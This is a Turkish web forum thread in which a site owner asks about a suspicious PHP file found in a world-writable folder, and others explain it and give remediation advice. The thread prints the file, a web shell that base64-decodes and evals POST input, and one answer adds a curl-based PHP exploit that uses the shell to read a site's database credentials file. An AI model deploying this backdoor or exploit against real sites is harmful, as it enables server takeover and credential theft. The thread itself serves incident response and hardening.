Merhaba, Bugün FTP'de güncelleme yaparken, chmod ayarı 777 olan bir klasörde 5733cb990161f.php isminde bir php dosyası farkettim. Dosyayı inceledim. Sanırım bir hacker saldırısı oldu. Dosyanın içeriği şu şekilde: PHP uzmanları acaba yardımcı olabilir mi?

    9890000
<?php 
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\\$safedg = $xsser;"); } ?>

Burada ne tür bir saldırı oluşmuş? Bu dosyayı FTP'ye nasıl yüklemiş olabilirler? Kısacası kodlarda tam olarak ne yapılmak isteniyor?

Önlem olarak ne yapmam gerekir?

soruldu: 11 Haz, 17:51

burhanaksendir's gravatar image

burhanaksendir
8524
cevap kabul oranı: 50%

eval'den kendini belli ediyor. POST isteğiyle gönderdiği kod bloğunu çalıştıran bir sayfadır bu. Bununla birçok şey yapılabilir. Özellikle shell dosyaları yüklemek için kullanılabilir. Bu da olduğu gibi web sitesini ve veritabanını ele geçirmek gibi bir şey. Bunun gibi dosyaları temizledikten sonra FTP ve DB bilgilerini değiştirin, güvenliğinizi gözden geçirin. Bu dosyayı, sitenin herhangi bir yerindeki dosya yükleme alanından atmış da olabilir. İncelemek lazım.

(12 Haz, 04:57) acemi acemi's gravatar image

Teşekkür ederim yorumunuz için. Kendi çapımda basit bir CMS yazmıştım. Admin panelinde de video ve foto yüklenebilen bir file upload scriptim vardı. Bu bahsettiğim klasöre dosya ekleyip silmek için 777 yapmıştım. Demek ki bu saldırgan kişi, o admin panelindeki dosya yükleme yerine ulaştı. Ya da yazdığım php scriptindeki bir açığı buldu dosyayı çaktı gitti. Şimdi bütün emekler çöpe gitti o zaman. Güvenlik konusunu hep hafife almıştım, korktuğum başıma geldi yani. Bakalım ne yapacam şimdi.

(12 Haz, 06:53) burhanaksendir burhanaksendir's gravatar image

Uzaktan kod çalıştırmaya yarayan bir dosyadır bu. Hostundaki dosyaları okuyabilir, veritabanı şifrelerini çalabilir, tüm scriptlerini indirebilir, hostundaki dosyalarda değişiklik yapabilir. Kısacası php ne yapabiliyorsa hepsini yapabilir. Bu dosyayı kullanarak veritabanına erişim şifresini çalma exploiti ise şu şekilde olabilir:

<?

function exploitMe( $data ){
    $request = array( "z" => 1, "z0" => base64_encode($data) );
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'http://targetsite.com/5733cb990161f.php');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1) ;
    curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

$result = exploitMe('echo file_get_contents("/var/www/targetsite.com/ht_docs/db.php");');

O dosyanın oraya nasıl geldiği sorusuna verilebilecek cevaplar mevcut. Hostundaki herhangi bir php dosyasındaki bir açık kullanılmış olabilir ya da aynı serverdaki farklı bir host üzerinden senin hostundaki 777 yazma izni bulunan bir klasöre bu dosya yazılmış olabilir. Biraz karışık mevzular. İncelemek lazım.

permanent link

cevaplandı: 12 Haz, 05:19

kodmanyagha's gravatar image

kodmanyagha
3.1k132852
cevap kabul oranı: 15%

değiştirildi: 12 Haz, 05:21

Açıklayıcı cevap için teşekkür ederim. O zaman ben harbiden de hapı yuttum demektir. Kendimi, kavurucu çöl güneşinde yanmaya bırakılmış ezik bir tavşan gibi hissediyorum.

1und1.de adresindeki shared bir hosting paketini kullanıyorum. Şimdi ben, işin ilginç tarafı, sitedeki traffic loglarını inceledim. Dosyanın FTP'ye eklendiği tarih ve saatteki bilgileri de silmiş bu dosyayı ekleyen kişi.. Arkasında iz bırakmamak için herhalde.

(12 Haz, 06:50) burhanaksendir burhanaksendir's gravatar image

dosya muhtemelen ftp üzerinden eklenmemiştir. o yüzden öyle bir kayıt yoktur. dediğim gibi aynı serverda başka bir hosttan senin hostundaki 777 yazma izni olan bir klasör içerisine bu dosya konmuş olabilir. shared host kullanırken klasör izinlerinizi 700 yapabilirsiniz. böylece sadece sizin erişiminiz olur. izinlerle ilgili bilgiyi şu adresten bulabilirsiniz: https://www.maketecheasier.com/file-permissions-what-does-chmod-777-means/

(12 Haz, 06:55) kodmanyagha kodmanyagha's gravatar image

Çok teşekkür ederim yardımınız için.

(12 Haz, 06:57) burhanaksendir burhanaksendir's gravatar image
Cevabınız
toggle preview

Bu soruyu takip et

E-Posta üzerinden:

Üyelik girişi yaptıktan sonra abonelik işlemlerini yapabilirsiniz

RSS üzerinden:

Cevaplar

Cevaplar ve Yorumlar

Yazı Formatlama

  • *italic* ya da _italic_
  • **bold** ya da __bold__
  • link:[text](http://url.com/ "başlık")
  • resim?![alt text](/path/img.jpg "başlık")
  • liste: 1. Foo 2. Bar
  • temel HTML etiketleri de kullanılabilir

Bu sorunun etiketleri:

×168

Soruldu: 11 Haz, 17:51

Görüntüleme: 231 kez

Son güncelleme: 12 Haz, 06:57

powered by BitNami OSQA